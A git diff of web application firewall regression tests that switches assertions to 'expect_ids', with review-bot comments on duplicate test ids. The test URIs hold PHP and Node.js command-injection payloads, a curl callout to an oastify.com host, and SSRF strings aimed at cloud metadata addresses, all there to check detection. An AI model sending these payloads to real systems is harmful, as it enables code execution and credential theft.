"/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: @@ -123,7 +130,8 @@ tests: uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: @@ -138,7 +146,8 @@ tests: uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: 
@@ -153,7 +162,8 @@ tests: uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: @@ -168,7 +178,8 @@ tests: uri: "/get?x=%28system%29%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: @@ -183,7 +194,8 @@ tests: uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: @@ -198,7 +210,8 @@ tests: uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: @@ -213,7 +226,8 @@ tests: uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: @@ -228,7 +242,8 @@ tests: uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: @@ -243,7 +258,8 @@ tests: uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: 
@@ -259,7 +275,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933211" + log: + no_expect_ids: [933211] - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: @@ -275,7 +292,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "933211" + log: + no_expect_ids: [933211] - test_id: 19 desc: Block function call via string stages: @@ -290,7 +308,8 @@ tests: uri: "/get?code=%22system%22%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 20 desc: Block function call via string using hex escape sequence stages: @@ -305,7 +324,8 @@ tests: uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] - test_id: 21 desc: Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon) stages: @@ -320,4 +340,5 @@ tests: uri: "/get?code=(sy.(st).em)(%40id)" version: "HTTP/1.1" output: - log_contains: id "933211" + log: + expect_ids: [933211] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index 691f428d0..17d72f457 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=_%24%24ND_FUNC%24%24_" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 2 desc: imported test stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=__js_function" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 3 desc: imported test stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=eval%28String.fromCharCode" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 4 desc: imported test stages: 
@@ -63,7 +66,8 @@ tests: uri: "/get?foo=function%28%29+%7B" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 5 desc: imported test stages: @@ -78,7 +82,8 @@ tests: uri: "/get?foo=new+Function+%28" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 6 desc: imported test stages: @@ -93,7 +98,8 @@ tests: uri: "/get?foo=this.constructor.constructor" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 7 desc: imported test stages: @@ -108,7 +114,8 @@ tests: uri: "/get?foo=module.exports%3D" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 8 desc: base64 encoded test stages: @@ -123,7 +130,8 @@ tests: uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 9 desc: base64 encoded test stages: @@ -138,7 +146,8 @@ tests: uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 10 desc: process.env test stages: @@ -153,7 +162,8 @@ tests: uri: "/get?foo=process.env" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 11 desc: console.info test stages: @@ -168,7 +178,8 @@ tests: uri: "/get?foo=console.info(1)" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 12 desc: console.info test (JavaScript escape sequences) stages: @@ -183,7 +194,8 @@ tests: uri: "/get?foo=c%5Cu006fnsole.info(1)" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 13 desc: process.env test (square bracket property access) stages: @@ -198,7 +210,8 @@ tests: uri: '/get?foo=process["env"]' version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 14 desc: console.info test (square bracket property access) stages: 
@@ -213,7 +226,8 @@ tests: uri: '/get?foo=console["info"](1)' version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 15 desc: console.info test (call method) stages: @@ -228,7 +242,8 @@ tests: uri: "/get?foo=console.info.call(this,1)" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 16 desc: '"process" false positive test' stages: @@ -243,7 +258,8 @@ tests: uri: "/get?foo=process." version: HTTP/1.0 output: - no_log_contains: id "934100" + log: + no_expect_ids: [934100] - test_id: 17 desc: '"console" false positive test' stages: @@ -258,7 +274,8 @@ tests: uri: "/get?foo=console." version: HTTP/1.0 output: - no_log_contains: id "934100" + log: + no_expect_ids: [934100] - test_id: 18 desc: ssti test 1 stages: @@ -273,7 +290,8 @@ tests: uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 19 desc: ssti test 2 stages: @@ -288,7 +306,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 20 desc: ssti test 3 stages: @@ -303,7 +322,8 @@ tests: uri: "/get?foo=process%5Breq.query.a" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 21 desc: ssti test 4 stages: @@ -318,7 +338,8 @@ tests: uri: "/get?foo=require%5Breq.query.a" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 22 desc: ssti test 5 stages: @@ -333,7 +354,8 @@ tests: uri: "/get?foo=process%5BmainModule" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 23 desc: require child_process stages: 
@@ -348,7 +370,8 @@ tests: uri: /get?foo=require("child_process").exec('whoami') version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 24 desc: "5ZLKNU33" stages: @@ -365,7 +388,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 25 desc: "5ZLKNU33" stages: @@ -382,7 +406,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 26 desc: "5ZLKNU33" stages: @@ -399,7 +424,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 25 desc: "5ZLKNU33" stages: @@ -415,7 +441,8 @@ tests: console.info(1) uri: /post output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 26 desc: "5ZLKNU33" stages: @@ -431,7 +458,8 @@ tests: console.info(1) uri: /post output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: @@ -447,7 +475,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 28 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation" stages: @@ -463,7 +492,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 29 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded" stages: @@ -479,7 +509,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 30 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: 
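Review bot: In 934100.yaml the hunks from `@@ -382,7 +406,8 @@` to `@@ -431,7 +458,8 @@` show `test_id: 25` and `test_id: 26` each assigned twice, first to the `uri: "/post"` / `version: "HTTP/1.1"` cases and again to the `console.info(1)` / `uri: /post` cases, and the commit rewrites those entries without resolving the duplicates. The test id is presumably the key that per-platform overrides and result reporting use to identify a case, so two cases sharing `934100-25` cannot be skipped or reported separately; renumbering the second pair and the cases that follow them (27–31) so that every id is unique would fix this. The five entries labelled `desc: "5ZLKNU33"` also tell a reader nothing about what is exercised; a description naming the payload placement (JSON body, `console.info(1)` in the request body, …) would help. Each test's `stages:` body continues outside its hunk.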
@@ -495,7 +526,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] - test_id: 31 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: @@ -511,4 +543,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "934100" + log: + expect_ids: [934100] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index f49e6353d..7d152b405 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 2 desc: additional node ssti tests 2 stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 3 desc: additional node ssti tests 3 stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 4 desc: require child_process stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=require(\"child_process\").exec('whoami')" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 5 desc: require child_process spawn stages: 
@@ -78,7 +82,8 @@ tests: uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" version: HTTP/1.0 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 6 desc: "Detect example payload require(... submitted as plaintext" stages: @@ -94,7 +99,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 7 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation" stages: @@ -110,7 +116,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 8 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded" stages: @@ -126,7 +133,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 9 desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: @@ -142,7 +150,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] - test_id: 10 desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: @@ -158,4 +167,5 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "934101" + log: + expect_ids: [934101] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index 7dc54e0c6..b71b664ce 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml 
@@ -20,7 +20,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 2 desc: SSRF - check digitalcloud url stages: @@ -37,7 +38,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 3 desc: SSRF - check packetcloud url stages: @@ -54,7 +56,8 @@ tests: uri: "/get/test?ssrf=https%3A%2F%2Fmetadata.packet.net%2Fuserdata" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 4 desc: SSRF - check openstack url stages: @@ -71,7 +74,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Fopenstack" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 5 desc: SSRF - check oracle cloud url stages: @@ -88,7 +92,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F" version: "HTTP/1.1" output: - log_contains: id "934110" + log: + expect_ids: [934110] - test_id: 6 desc: SSRF - negative test aws stages: @@ -105,7 +110,8 @@ tests: uri: "/get/test?ssrf=169.254.169.254%2Flatest%2Fuser-data" version: "HTTP/1.1" output: - no_log_contains: id "934110" + log: + no_expect_ids: [934110] - test_id: 7 desc: SSRF - negative test aws stages: @@ -122,7 +128,8 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest" version: "HTTP/1.1" output: - no_log_contains: id "934110" + log: + no_expect_ids: [934110] - test_id: 8 desc: SSRF - negative test gcp stages: @@ -139,4 +146,5 @@ tests: uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal" version: "HTTP/1.1" output: - no_log_contains: id "934110" + log: + no_expect_ids: [934110] 
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml index 76f57f20d..697f26b79 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml @@ -1,7 +1,6 @@ --- meta: author: "fzipitria, Max Leske, azurit" - description: "Description" rule_id: 934120 tests: - test_id: 1 @@ -20,7 +19,8 @@ tests: uri: "/get?ssrf=http://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 2 desc: SSRF - IPv4, Dotless decimal with overflow stages: @@ -37,7 +37,8 @@ tests: uri: "/get?ssrf=http://7147006462/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 3 desc: SSRF - IPv4, Dotted hexadecimal stages: @@ -54,7 +55,8 @@ tests: uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 4 desc: SSRF - IPv4, Dotless hexadecimal stages: @@ -71,7 +73,8 @@ tests: uri: "/get?ssrf=http://0xA9FEA9FE/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 5 desc: SSRF - IPv4, Dotless hexadecimal with overflow stages: @@ -88,7 +91,8 @@ tests: uri: "/get?ssrf=http://0x41414141A9FEA9FE/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 6 desc: SSRF - IPv4, Dotted octal stages: @@ -105,7 +109,8 @@ tests: uri: "/get?ssrf=http://0251.0376.0251.0376/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 7 desc: SSRF - IPv4, Dotted octal with padding stages: 
@@ -122,7 +127,8 @@ tests: uri: "/get?ssrf=http://0251.00376.000251.0000376/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 8 desc: SSRF - IPv4, dotted, two bytes decimal, two bytes octal stages: @@ -139,7 +145,8 @@ tests: uri: "/get?ssrf=http://169.254.43518/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 9 desc: SSRF - IPv4, dotted, one byte decimal, three bytes octal stages: @@ -156,7 +163,8 @@ tests: uri: "/get?ssrf=http://169.16689662/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 10 desc: SSRF - IPv6, first 10 bytes compressed stages: @@ -173,7 +181,8 @@ tests: uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 11 desc: SSRF - IPV6 Expanded stages: @@ -190,7 +199,8 @@ tests: uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 12 desc: SSRF - IPV6 Expanded - Negative tests stages: @@ -207,7 +217,8 @@ tests: uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 13 desc: SSRF - Dotless decimal - Negative tests stages: @@ -224,7 +235,8 @@ tests: uri: "/get?ssrf=2852039166" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 14 desc: SSRF - Dotless hexadecimal with overflow - Negative tests stages: @@ -241,7 +253,8 @@ tests: uri: "/get?ssrf=0x41414141A9FEA9FE" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 15 desc: SSRF - Negative tests - IPv4, dotted, one byte decimal, three bytes octal stages: 
@@ -258,7 +271,8 @@ tests: uri: "/get?ssrf=169.16689662" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 16 desc: SSRF - Negative tests - IPV6 Compressed stages: @@ -275,7 +289,8 @@ tests: uri: "/get?ssrf=[::ffff:a9fe:a9fe" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 17 desc: SSRF - Negative tests - IPV6 Compressed stages: @@ -292,7 +307,8 @@ tests: uri: "/get?ssrf=[::ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 18 desc: SSRF - Negative tests - IPV6 Expanded stages: @@ -309,7 +325,8 @@ tests: uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 19 desc: SSRF - Negative tests - IPV6/IPV4 stages: @@ -326,7 +343,8 @@ tests: uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - no_log_contains: id "934120" + log: + no_expect_ids: [934120] - test_id: 20 desc: SSRF - Evasion technique 1 stages: @@ -343,7 +361,8 @@ tests: uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 21 desc: SSRF - Weird protocol scheme 1 stages: @@ -360,7 +379,8 @@ tests: uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 22 desc: SSRF - Weird protocol scheme 2 stages: @@ -377,7 +397,8 @@ tests: uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 23 desc: SSRF - Enclosed alphanumerics 1 - digits stages: 
@@ -394,7 +415,8 @@ tests: uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 24 desc: SSRF - Enclosed alphanumerics 2 - digits stages: @@ -411,7 +433,8 @@ tests: uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 25 desc: SSRF - Enclosed alphanumerics 3 - text stages: @@ -428,7 +451,8 @@ tests: uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 26 desc: SSRF - Enclosed alphanumerics 3 - text stages: @@ -445,7 +469,8 @@ tests: uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 27 desc: SSRF - 8-Bit Octal conversion stages: @@ -462,7 +487,8 @@ tests: uri: "/get?ssrf=ssh://0177.00.00.01" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 28 desc: SSRF - 32-Bit Octal conversion stages: @@ -479,7 +505,8 @@ tests: uri: "/get?ssrf=rtmp://017700000001" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 29 desc: SSRF - 32-Bit Hex conversion stages: @@ -496,7 +523,8 @@ tests: uri: "/get?ssrf=gopher://0x7f000001" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 30 desc: SSRF - IPv6, first byte full, rest compressed stages: @@ -513,7 +541,8 @@ tests: uri: "/get?ssrf=http://[a::]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 31 desc: SSRF - IPv6, first byte full, last byte full, rest compressed stages: @@ -530,7 +559,8 @@ tests: uri: "/get?ssrf=http://[a::b]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 32 desc: SSRF - IPv6, compressed in the middle stages: 
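Review bot: In 934120.yaml the `desc` lines at the end of hunks `@@ -411,7 +433,8 @@` and `@@ -428,7 +451,8 @@` give tests 25 and 26 the identical description `SSRF - Enclosed alphanumerics 3 - text`, although the second case sends upper-case enclosed letters (`pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ` in hunk `@@ -445,7 +469,8 @@`) rather than the lower-case ones of test 25. Changing the second to `desc: SSRF - Enclosed alphanumerics 4 - text, upper case` keeps the numbering of the series consistent and tells a reader what distinguishes the case. The `stages:` body of each test continues outside its hunk.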
@@ -547,7 +577,8 @@ tests: uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 33 desc: SSRF - IPv6, link-local unicast with zone ID, compressed stages: @@ -564,7 +595,8 @@ tests: uri: "/get?ssrf=http://[fe80::%zone1]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 34 desc: SSRF - IPv6, link-local unicast with zone ID, full stages: @@ -581,7 +613,8 @@ tests: uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 35 desc: SSRF - IPv6, IPv4 mapped stages: @@ -598,7 +631,8 @@ tests: uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 36 desc: SSRF - IPv6, IPv4 compatible stages: @@ -615,7 +649,8 @@ tests: uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 37 desc: SSRF - URL bypass, IP + domain stages: @@ -632,7 +667,8 @@ tests: uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 38 desc: SSRF - URL bypass, domain + IP stages: @@ -649,7 +685,8 @@ tests: uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 39 desc: SSRF - Enclosed alphanumerics, dots stages: @@ -666,7 +703,8 @@ tests: uri: "/get?ssrf=http://169。254。169。254/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 40 desc: SSRF - IPv6, the unspecified address stages: 
@@ -683,7 +721,8 @@ tests: uri: "/get?ssrf=http://[::]/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 41 desc: SSRF - Glibc NSS features stages: @@ -700,7 +739,8 @@ tests: uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 42 desc: SSRF - Glibc NSS features stages: @@ -717,7 +757,8 @@ tests: uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 43 desc: SSRF - Input variable coverage test (Dotless decimal) stages: @@ -735,7 +776,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -751,7 +793,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -774,7 +817,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -789,7 +833,8 @@ tests: uri: "/get?http://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -804,7 +849,8 @@ tests: uri: "/get?ssrf=http://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - input: dest_addr: "127.0.0.1" port: 80 @@ -821,7 +867,8 @@ tests: data: "<?xml version=\"1.0\"?><xml><ssrf>http://2852039166/</ssrf></xml>" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] - test_id: 44 desc: SSRF - 